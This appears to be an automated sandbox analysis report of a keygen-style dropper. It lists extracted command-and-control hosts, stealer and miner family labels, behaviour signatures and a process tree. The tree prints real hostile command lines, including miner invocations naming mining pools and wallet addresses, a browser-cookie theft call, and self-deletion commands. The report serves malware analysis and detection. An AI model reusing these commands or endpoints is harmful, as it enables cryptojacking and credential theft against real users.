Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    29-04-2021 05:03

General

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

EUR1

C2

younamebit.info:80

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 21 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 63 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1460
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1936
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2868
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2800
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2780
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2528
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2472
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1144
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1028
                    • C:\Users\Admin\AppData\Roaming\vsvrtdc
                      C:\Users\Admin\AppData\Roaming\vsvrtdc
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5832
                      • C:\Users\Admin\AppData\Roaming\vsvrtdc
                        C:\Users\Admin\AppData\Roaming\vsvrtdc
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5808
                    • C:\Users\Admin\AppData\Roaming\vsvrtdc
                      C:\Users\Admin\AppData\Roaming\vsvrtdc
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5176
                      • C:\Users\Admin\AppData\Roaming\vsvrtdc
                        C:\Users\Admin\AppData\Roaming\vsvrtdc
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5172
                    • C:\Users\Admin\AppData\Roaming\vsvrtdc
                      C:\Users\Admin\AppData\Roaming\vsvrtdc
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4136
                      • C:\Users\Admin\AppData\Roaming\vsvrtdc
                        C:\Users\Admin\AppData\Roaming\vsvrtdc
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4780
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1016
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3736
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2716
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:200
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3484
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2816
                        • C:\Users\Admin\AppData\Local\Temp\is-L7UV5.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-L7UV5.tmp\Install.tmp" /SL5="$400C8,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2188
                          • C:\Users\Admin\AppData\Local\Temp\is-0BBHV.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-0BBHV.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:752
                            • C:\Program Files\Windows Security\PSJMCOMFMT\ultramediaburner.exe
                              "C:\Program Files\Windows Security\PSJMCOMFMT\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4180
                              • C:\Users\Admin\AppData\Local\Temp\is-D2GM2.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-D2GM2.tmp\ultramediaburner.tmp" /SL5="$30086,281924,62464,C:\Program Files\Windows Security\PSJMCOMFMT\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4212
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4256
                            • C:\Users\Admin\AppData\Local\Temp\6c-15bbf-7cb-20f87-0425caa48ff44\SHivevujole.exe
                              "C:\Users\Admin\AppData\Local\Temp\6c-15bbf-7cb-20f87-0425caa48ff44\SHivevujole.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4272
                            • C:\Users\Admin\AppData\Local\Temp\8b-0b581-bd1-044b4-f21e2547ac985\Hetewofulae.exe
                              "C:\Users\Admin\AppData\Local\Temp\8b-0b581-bd1-044b4-f21e2547ac985\Hetewofulae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4332
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\35gbnn4a.1dw\skipper.exe /s & exit
                                6⤵
                                  PID:4896
                                  • C:\Users\Admin\AppData\Local\Temp\35gbnn4a.1dw\skipper.exe
                                    C:\Users\Admin\AppData\Local\Temp\35gbnn4a.1dw\skipper.exe /s
                                    7⤵
                                      PID:4944
                                      • C:\Users\Admin\AppData\Local\Temp\1359918164.exe
                                        C:\Users\Admin\AppData\Local\Temp\1359918164.exe
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5296
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          9⤵
                                            PID:5936
                                        • C:\Users\Admin\AppData\Local\Temp\936231124.exe
                                          C:\Users\Admin\AppData\Local\Temp\936231124.exe
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4136
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            9⤵
                                              PID:4664
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              9⤵
                                                PID:6568
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\35gbnn4a.1dw\skipper.exe & exit
                                              8⤵
                                                PID:7012
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 0
                                                  9⤵
                                                  • Runs ping.exe
                                                  PID:5676
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gun20xsp.apk\001.exe & exit
                                            6⤵
                                              PID:5860
                                              • C:\Users\Admin\AppData\Local\Temp\gun20xsp.apk\001.exe
                                                C:\Users\Admin\AppData\Local\Temp\gun20xsp.apk\001.exe
                                                7⤵
                                                  PID:6128
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5nfr1eq0.b5w\gpooe.exe & exit
                                                6⤵
                                                  PID:5052
                                                  • C:\Users\Admin\AppData\Local\Temp\5nfr1eq0.b5w\gpooe.exe
                                                    C:\Users\Admin\AppData\Local\Temp\5nfr1eq0.b5w\gpooe.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    PID:1308
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5432
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:4388
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:6872
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:7076
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwf3dhj3.l3r\google-game.exe & exit
                                                  6⤵
                                                    PID:5764
                                                    • C:\Users\Admin\AppData\Local\Temp\pwf3dhj3.l3r\google-game.exe
                                                      C:\Users\Admin\AppData\Local\Temp\pwf3dhj3.l3r\google-game.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5644
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                        8⤵
                                                        • Loads dropped DLL
                                                        PID:2716
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hqzou44f.xyc\HookSetp.exe /silent & exit
                                                    6⤵
                                                    • Blocklisted process makes network request
                                                    • Checks computer location settings
                                                    • Checks whether UAC is enabled
                                                    • Drops file in Windows directory
                                                    • Modifies Control Panel
                                                    • Modifies Internet Explorer settings
                                                    • Modifies registry class
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4908
                                                    • C:\Users\Admin\AppData\Local\Temp\hqzou44f.xyc\HookSetp.exe
                                                      C:\Users\Admin\AppData\Local\Temp\hqzou44f.xyc\HookSetp.exe /silent
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5776
                                                      • C:\Users\Admin\AppData\Roaming\7507408.exe
                                                        "C:\Users\Admin\AppData\Roaming\7507408.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5948
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y1mtckke.kez\BBCbrowser.exe /VERYSILENT & exit
                                                    6⤵
                                                      PID:4640
                                                      • C:\Users\Admin\AppData\Local\Temp\y1mtckke.kez\BBCbrowser.exe
                                                        C:\Users\Admin\AppData\Local\Temp\y1mtckke.kez\BBCbrowser.exe /VERYSILENT
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4580
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          8⤵
                                                            PID:6988
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fe42pxey.jys\md2_2efs.exe & exit
                                                        6⤵
                                                          PID:5428
                                                          • C:\Users\Admin\AppData\Local\Temp\fe42pxey.jys\md2_2efs.exe
                                                            C:\Users\Admin\AppData\Local\Temp\fe42pxey.jys\md2_2efs.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            PID:5556
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3giuqlj.zqy\askinstall39.exe & exit
                                                          6⤵
                                                            PID:3484
                                                            • C:\Users\Admin\AppData\Local\Temp\x3giuqlj.zqy\askinstall39.exe
                                                              C:\Users\Admin\AppData\Local\Temp\x3giuqlj.zqy\askinstall39.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6128
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                8⤵
                                                                  PID:6556
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    9⤵
                                                                    • Kills process with taskkill
                                                                    PID:6836
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i54uj1pu.tgh\y1.exe & exit
                                                              6⤵
                                                                PID:5624
                                                                • C:\Users\Admin\AppData\Local\Temp\i54uj1pu.tgh\y1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\i54uj1pu.tgh\y1.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:4972
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\i54uj1pu.tgh\y1.exe"
                                                                    8⤵
                                                                      PID:4596
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /T 10 /NOBREAK
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:4804
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4tkybcwr.2sr\jvppp.exe & exit
                                                                  6⤵
                                                                    PID:4960
                                                                    • C:\Users\Admin\AppData\Local\Temp\4tkybcwr.2sr\jvppp.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\4tkybcwr.2sr\jvppp.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:3860
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:6160
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:6216
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:7032
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:6252
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4ouyzkm.3ck\GcleanerWW.exe /mixone & exit
                                                                    6⤵
                                                                    • Blocklisted process makes network request
                                                                    • Modifies data under HKEY_USERS
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4476
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bhkeai43.ukv\toolspab1.exe & exit
                                                                    6⤵
                                                                      PID:4844
                                                                      • C:\Users\Admin\AppData\Local\Temp\bhkeai43.ukv\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\bhkeai43.ukv\toolspab1.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:6264
                                                                        • C:\Users\Admin\AppData\Local\Temp\bhkeai43.ukv\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\bhkeai43.ukv\toolspab1.exe
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:6648
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\au0qk0sa.vtp\005.exe & exit
                                                                      6⤵
                                                                        PID:5584
                                                                        • C:\Users\Admin\AppData\Local\Temp\au0qk0sa.vtp\005.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\au0qk0sa.vtp\005.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:6364
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4476
                                                                • C:\Users\Admin\AppData\Roaming\6C1D.tmp.exe
                                                                  "C:\Users\Admin\AppData\Roaming\6C1D.tmp.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4376
                                                                  • C:\Users\Admin\AppData\Roaming\6C1D.tmp.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6C1D.tmp.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:5144
                                                                • C:\Users\Admin\AppData\Roaming\6EFD.tmp.exe
                                                                  "C:\Users\Admin\AppData\Roaming\6EFD.tmp.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4156
                                                                  • C:\Windows\system32\msiexec.exe
                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w21725@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                    4⤵
                                                                      PID:5268
                                                                    • C:\Windows\system32\msiexec.exe
                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w26098 --cpu-max-threads-hint 50 -r 9999
                                                                      4⤵
                                                                      • Blocklisted process makes network request
                                                                      PID:5516
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                    3⤵
                                                                      PID:4728
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 127.0.0.1
                                                                        4⤵
                                                                        • Runs ping.exe
                                                                        PID:5168
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks whether UAC is enabled
                                                                    PID:2272
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:6428
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:6860
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:1400
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:6196
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:6332
                                                                • \??\c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                  1⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  • Modifies data under HKEY_USERS
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2268
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                    2⤵
                                                                    • Checks processor information in registry
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:3360
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                  1⤵
                                                                    PID:4908
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:4956
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1356
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    PID:3408
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                    1⤵
                                                                    • Drops file in Windows directory
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5964
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
